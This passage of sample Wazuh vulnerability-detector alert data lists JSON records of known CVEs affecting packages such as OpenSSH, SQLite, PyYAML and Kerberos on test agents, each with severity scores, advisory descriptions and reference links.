sqlite3","id":"23503","firedtimes":19,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"sqlite3","version":"3.22.0-1ubuntu0.3","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"2.100000"}},"cve":"CVE-2019-19645","title":"CVE-2019-19645 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements.","severity":"Low","published":"2019-12-09","updated":"2019-12-23","state":"Unfixed","cwe_reference":"CWE-674","references":["https://github.com/sqlite/sqlite/commit/38096961c7cd109110ac21d3ed7dad7e0cb0ae06","https://security.netapp.com/advisory/ntap-20191223-0001/","https://www.oracle.com/security-alerts/cpuapr2020.html","https://nvd.nist.gov/vuln/detail/CVE-2019-19645","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-19645.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19645"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17595 affects ncurses-base","id":"23504","firedtimes":222,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"ncurses-base","source":"ncurses","version":"6.1-1ubuntu1.18.04","architecture":"all","condition":"Package less than 6.1.20191012"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"partial"},"base_score":"5.800000"}},"cve":"CVE-2019-17595","title":"CVE-2019-17595 on Ubuntu 18.04 LTS (bionic) - negligible.","rationale":"There is a heap-based buffer over-read in the fmt_entry function in tinfo/comp_hash.c in the terminfo library in ncurses before 6.1-20191012.","severity":"Medium","published":"2019-10-14","updated":"2019-12-23","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942401"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00059.html","http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00061.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00013.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00045.html","https://nvd.nist.gov/vuln/detail/CVE-2019-17595","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-17595.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17595"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-15919 affects openssh-client","id":"23504","firedtimes":197,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssh-client","source":"openssh","version":"1:7.6p1-4ubuntu0.3","architecture":"amd64","condition":"Package greater or equal than 5.9 and less or equal than 7.8"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"low","integrity_impact":"none","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2018-15919","title":"CVE-2018-15919 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"Remotely observable behaviour in auth-gss2.c in OpenSSH through 7.8 could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. NOTE: the discoverer states 'We understand that the OpenSSH developers do not want to treat such a username enumeration (or \"oracle\") as a vulnerability.'","severity":"Medium","published":"2018-08-28","updated":"2019-03-07","state":"Fixed","cwe_reference":"CWE-200","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=907503","https://bugzilla.novell.com/show_bug.cgi?id=CVE-2018-15919"],"references":["http://seclists.org/oss-sec/2018/q3/180","http://www.securityfocus.com/bid/105163","https://security.netapp.com/advisory/ntap-20181221-0001/","https://nvd.nist.gov/vuln/detail/CVE-2018-15919","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15919.html","http://www.openwall.com/lists/oss-security/2018/08/27/2","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15919"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-20079 affects vim","id":"23505","firedtimes":109,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"vim","version":"2:7.4.1689-3ubuntu1.4","architecture":"amd64","condition":"Package less than 8.1.2136"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"}},"cve":"CVE-2019-20079","title":"The autocmd feature in window.c in Vim before 8.1.2136 accesses freed memory.","severity":"High","published":"2019-12-30","updated":"2020-03-30","state":"Fixed","cwe_reference":"CWE-416","references":["https://github.com/vim/vim/commit/ec66c41d84e574baf8009dbc0bd088d2bc5b2421","https://github.com/vim/vim/compare/v8.1.2135...v8.1.2136","https://packetstormsecurity.com/files/154898","https://usn.ubuntu.com/4309-1/","https://nvd.nist.gov/vuln/detail/CVE-2019-20079"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2017-15088 affects krb5-locales","id":"23506","firedtimes":73,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"krb5-locales","source":"krb5","version":"1.13.2+dfsg-5ubuntu2.1","architecture":"all","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2017-15088","title":"CVE-2017-15088 on Ubuntu 16.04 LTS (xenial) - negligible.","rationale":"plugins/preauth/pkinit/pkinit_crypto_openssl.c in MIT Kerberos 5 (aka krb5) through 1.15.2 mishandles Distinguished Name (DN) fields, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) in situations involving untrusted X.509 data, related to the get_matching_data and X509_NAME_oneline_ex functions. NOTE: this has security relevance only in use cases outside of the MIT Kerberos distribution, e.g., the use of get_matching_data in KDC certauth plugin code that is specific to Red Hat.","severity":"Critical","published":"2017-11-23","updated":"2019-10-09","state":"Unfixed","cwe_reference":"CWE-119","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=871698"],"references":["http://www.securityfocus.com/bid/101594","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=871698","https://bugzilla.redhat.com/show_bug.cgi?id=1504045","https://github.com/krb5/krb5/commit/fbb687db1088ddd894d975996e5f6a4252b9a2b4","https://github.com/krb5/krb5/pull/707","https://nvd.nist.gov/vuln/detail/CVE-2017-15088","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-15088.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15088"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-15919 affects openssh-server","id":"23504","firedtimes":198,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssh-server","source":"openssh","version":"1:7.6p1-4ubuntu0.3","architecture":"amd64","condition":"Package greater or equal than 5.9 and less or equal than 7.8"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"low","integrity_impact":"none","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2018-15919","title":"CVE-2018-15919 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"Remotely observable behaviour in auth-gss2.c in OpenSSH through 7.8 could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. NOTE: the discoverer states 'We understand that the OpenSSH developers do not want to treat such a username enumeration (or \"oracle\") as a vulnerability.'","severity":"Medium","published":"2018-08-28","updated":"2019-03-07","state":"Fixed","cwe_reference":"CWE-200","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=907503","https://bugzilla.novell.com/show_bug.cgi?id=CVE-2018-15919"],"references":["http://seclists.org/oss-sec/2018/q3/180","http://www.securityfocus.com/bid/105163","https://security.netapp.com/advisory/ntap-20181221-0001/","https://nvd.nist.gov/vuln/detail/CVE-2018-15919","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15919.html","http://www.openwall.com/lists/oss-security/2018/08/27/2","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15919"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-19645 affects libsqlite3-0","id":"23503","firedtimes":18,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libsqlite3-0","source":"sqlite3","version":"3.22.0-1ubuntu0.3","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"2.100000"}},"cve":"CVE-2019-19645","title":"CVE-2019-19645 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"alter.c in SQLite through 3.30.1 allows attackers to trigger infinite recursion via certain types of self-referential views in conjunction with ALTER TABLE statements.","severity":"Low","published":"2019-12-09","updated":"2019-12-23","state":"Unfixed","cwe_reference":"CWE-674","references":["https://github.com/sqlite/sqlite/commit/38096961c7cd109110ac21d3ed7dad7e0cb0ae06","https://security.netapp.com/advisory/ntap-20191223-0001/","https://www.oracle.com/security-alerts/cpuapr2020.html","https://nvd.nist.gov/vuln/detail/CVE-2019-19645","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-19645.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19645"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-11727 affects thunderbird","id":"23504","firedtimes":312,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"thunderbird","version":"1:68.8.0+build2-0ubuntu0.16.04.2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2019-11727","title":"CVE-2019-11727 on Ubuntu 16.04 LTS (xenial) - medium.","rationale":"A vulnerability exists where it possible to force Network Security Services (NSS) to sign CertificateVerify with PKCS#1 v1.5 signatures when those are the only ones advertised by server in CertificateRequest in TLS 1.3. PKCS#1 v1.5 signatures should not be used for TLS 1.3 messages. This vulnerability affects Firefox < 68.","severity":"Medium","published":"2019-07-23","updated":"2019-07-30","state":"Unfixed","cwe_reference":"CWE-295","bugzilla_references":["https://bugzilla.mozilla.org/show_bug.cgi?id=1552208"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00009.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00010.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00011.html","http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00006.html","https://access.redhat.com/errata/RHSA-2019:1951","https://bugzilla.mozilla.org/show_bug.cgi?id=1552208","https://security.gentoo.org/glsa/201908-12","https://www.mozilla.org/security/advisories/mfsa2019-21/","https://nvd.nist.gov/vuln/detail/CVE-2019-11727","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-11727.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11727","https://usn.ubuntu.com/usn/usn-4054-1","https://usn.ubuntu.com/usn/usn-4060-1","https://www.mozilla.org/en-US/security/advisories/mfsa2019-21/#CVE-2019-11727"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-7738 affects util-linux","id":"23505","firedtimes":129,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"util-linux","version":"2.27.1-6ubuntu3.10","architecture":"amd64","condition":"Package less or equal than 2.31"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"7.200000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-7738","title":"CVE-2018-7738 on Ubuntu 16.04 LTS (xenial) - negligible.","rationale":"In util-linux before 2.32-rc1, bash-completion/umount allows local users to gain privileges by embedding shell commands in a mountpoint name, which is mishandled during a umount command (within Bash) by a different user, as demonstrated by logging in as root and entering umount followed by a tab character for autocompletion.","severity":"High","published":"2018-03-07","updated":"2019-10-03","state":"Fixed","cwe_reference":"NVD-CWE-noinfo","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179","https://github.com/karelzak/util-linux/issues/539"],"references":["http://www.securityfocus.com/bid/103367","https://bugs.debian.org/892179","https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55","https://github.com/karelzak/util-linux/issues/539","https://www.debian.org/security/2018/dsa-4134","https://nvd.nist.gov/vuln/detail/CVE-2018-7738","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-7738.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7738"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17595 affects ncurses-base","id":"23504","firedtimes":222,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"ncurses-base","source":"ncurses","version":"6.1-1ubuntu1.18.04","architecture":"all","condition":"Package less than 6.1.20191012"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"partial"},"base_score":"5.800000"}},"cve":"CVE-2019-17595","title":"CVE-2019-17595 on Ubuntu 18.04 LTS (bionic) - negligible.","rationale":"There is a heap-based buffer over-read in the fmt_entry function in tinfo/comp_hash.c in the terminfo library in ncurses before 6.1-20191012.","severity":"Medium","published":"2019-10-14","updated":"2019-12-23","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942401"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00059.html","http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00061.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00013.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00045.html","https://nvd.nist.gov/vuln/detail/CVE-2019-17595","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-17595.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17595"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2013-4235 affects login","id":"23503","firedtimes":20,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"login","source":"shadow","version":"1:4.5-1ubuntu2","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"partial"},"base_score":"3.300000"}},"cve":"CVE-2013-4235","title":"CVE-2013-4235 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees","severity":"Low","published":"2019-12-03","updated":"2019-12-13","state":"Unfixed","cwe_reference":"CWE-367","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=778950","https://bugzilla.redhat.com/show_bug.cgi?id=884658"],"references":["https://access.redhat.com/security/cve/cve-2013-4235","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235","https://security-tracker.debian.org/tracker/CVE-2013-4235","https://nvd.nist.gov/vuln/detail/CVE-2013-4235","http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-4235.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2018-15919 affects openssh-server","id":"23504","firedtimes":198,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssh-server","source":"openssh","version":"1:7.6p1-4ubuntu0.3","architecture":"amd64","condition":"Package greater or equal than 5.9 and less or equal than 7.8"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"low","integrity_impact":"none","availability":"none"},"base_score":"5.300000"}},"cve":"CVE-2018-15919","title":"CVE-2018-15919 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"Remotely observable behaviour in auth-gss2.c in OpenSSH through 7.8 could be used by remote attackers to detect existence of users on a target system when GSS2 is in use. NOTE: the discoverer states 'We understand that the OpenSSH developers do not want to treat such a username enumeration (or \"oracle\") as a vulnerability.'","severity":"Medium","published":"2018-08-28","updated":"2019-03-07","state":"Fixed","cwe_reference":"CWE-200","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=907503","https://bugzilla.novell.com/show_bug.cgi?id=CVE-2018-15919"],"references":["http://seclists.org/oss-sec/2018/q3/180","http://www.securityfocus.com/bid/105163","https://security.netapp.com/advisory/ntap-20181221-0001/","https://nvd.nist.gov/vuln/detail/CVE-2018-15919","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-15919.html","http://www.openwall.com/lists/oss-security/2018/08/27/2","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15919"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2020-1747 affects python3-yaml","id":"23505","firedtimes":44,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.12-1build2","architecture":"amd64","condition":"Package less than 5.3.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"10"}},"cve":"CVE-2020-1747","title":"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","severity":"High","published":"2020-03-24","updated":"2020-05-11","state":"Fixed","cwe_reference":"CWE-20","references":["http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747","https://github.com/yaml/pyyaml/pull/386","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/","https://nvd.nist.gov/vuln/detail/CVE-2020-1747"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2019-13050 affects gnupg","id":"23505","firedtimes":114,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"gnupg","version":"1.4.20-1ubuntu3.3","architecture":"amd64","condition":"Package less or equal than 2.2.16"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"none","integrity_impact":"none","availability":"partial"},"base_score":"5"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"none","availability":"high"},"base_score":"7.500000"}},"cve":"CVE-2019-13050","title":"CVE-2019-13050 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"Interaction between the sks-keyserver code through 1.2.0 of the SKS keyserver network, and GnuPG through 2.2.16, makes it risky to have a GnuPG keyserver configuration line referring to a host on the SKS keyserver network. Retrieving data from this network may cause a persistent denial of service, because of a Certificate Spamming Attack.","severity":"High","published":"2019-06-29","updated":"2019-07-09","state":"Fixed","cwe_reference":"CWE-297","bugzilla_references":["https://bugs.launchpad.net/bugs/1844059","https://bugzilla.suse.com/show_bug.cgi?id=CVE-2019-13050","https://dev.gnupg.org/T4591","https://dev.gnupg.org/T4607","https://dev.gnupg.org/T4628"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00039.html","https://gist.github.com/rjhansen/67ab921ffb4084c865b3618d6955275f","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AUK2YRO6QIH64WP2LRA5D4LACTXQPPU4/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CP4ON34YEXEZDZOXXWV43KVGGO6WZLJ5/","https://lists.gnupg.org/pipermail/gnupg-announce/2019q3/000439.html","https://support.f5.com/csp/article/K08654551","https://support.f5.com/csp/article/K08654551?utm_source=f5support&utm_medium=RSS","https://twitter.com/lambdafu/status/1147162583969009664","https://nvd.nist.gov/vuln/detail/CVE-2019-13050","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-13050.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13050"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"}